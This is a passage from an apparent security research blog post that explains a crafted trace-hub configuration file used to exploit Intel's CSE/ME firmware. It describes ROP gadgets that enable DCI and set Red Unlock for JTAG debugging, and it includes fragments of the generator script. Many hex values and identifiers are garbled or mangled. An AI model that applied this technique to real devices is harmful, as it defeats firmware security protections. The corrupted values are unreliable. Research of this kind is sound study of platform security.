If we look back at the python script that generates the CT file for the exploit, we can now understand everything it does:
STACK_BASE=0x  (0)  BUFFER_OFFSET=0x 380 SYS_TRACER_CTX_OFFSET=0x 200 SYS_TRACER_CTX_REQ_OFFSET=0x  (c)  RET_ADDR_OFFSET=0x 338   def GenerateTHConfig ():     print ("[*] Generating fake tracehub configuration ...")     trace_hub_config=struct.pack (" The only remaining magic number is in thatdata_tailvariable, which is the TLS structure. The0x 03000300value is simply the thread ID.
Rops
The latest version of the exploit which adds CPU bring up will simply add the ROP gadgets needed to continue the bup initialization just as it would have, right after thebup_init_trace_hubreturned (by resetting the syslib context to the right value then restoring the stack and registers then returning into thebup_run_scripts).
TheROPs are quite simple, they do two things: First, they enable the DCI interface, then they set the DfX Aggregator personality to 3 (which enabled RED Unlock for JTAG) then enter an infinite loop.
// Enable DCI side_band_mapping (0x 706 A8, 0x 100); put_sel_word (0x 19 F, 0, 0x 1010); // Sets 0x 19 F: 0 to 0x 1010  // Set DfX-agg personality side_band_mapping (0x 70684, 0x 100); put_sel_word (0x  (F, 0x) , 3); // Sets 0x 19 F: 8400 to 3  loop ();
I wondered for a long time “what is that sideband mapping” and “what are those 0x  (a8 and 0x)  values ”. I will explain these in the next blog post (in the next couple of days) but in summary, it causes segment 0x 19 F to be mapped to the DCI and DfX Aggregator devices' Private Configuration Registers (PCRs). So first, you map segment 0x 19 F to the DCI device's PCR, then you enable DCI by setting the flags to 1, then you map segment 0x 19 F to the DfX-agg device then set the personality register in its PCR at offset 0x 8400 to 3 (red).
With just those two values set, you have DCI enabled and Red Unlock enabled, and the exploit is working. Congratulations, you can now play around with your CSE device via JTAG.
Conclusion
The CT file has 4 things:
Header: which sets the various values in segment 0xBF for the systracer to work Big ROPs: which execute the custom code we want to enable DCI and RED unlock
Small ROPs: Smaller header at offset 0x 338 which does apop esp; retto return us to the first bigger ROP
TLS: The modified TLS header which points the syslib context to 0x  (A)  so the systracer offset points to the return address of the function that sets it.

The new TLS has a new syslib context which points the systracer offset to the return address of thebup_init_trace_hub_set_systracerfunction that modifies it using the v alues in the ct file header in order to jump to offset 0x 49 BDB in  (sub _) *************************************************************************************************************************************************************** (BB6)  so that when that function returns, it will jump to the small ROP which will replace ESP with the address of the Big ROPs then execute them, which then enables DCI and JTAG and loops forever or continues the bup init process depending on the version of the exploit used.
Yeah .. that was a lot of fun to figure out. So you see that this exploit is not entirely the same as the skylake exploit. The skylake exploit is actually quite a lot more difficult to achieve because it involves more moving parts. I assume that’s the reason why PT hadn’t released that.
In thenext postI write, I will explain how I ported this exploit to ME 11 .x using the information provided by Positive Technologies and I will explain how to port your own ME version to it using what I wrote as a base.
Thanks for reading!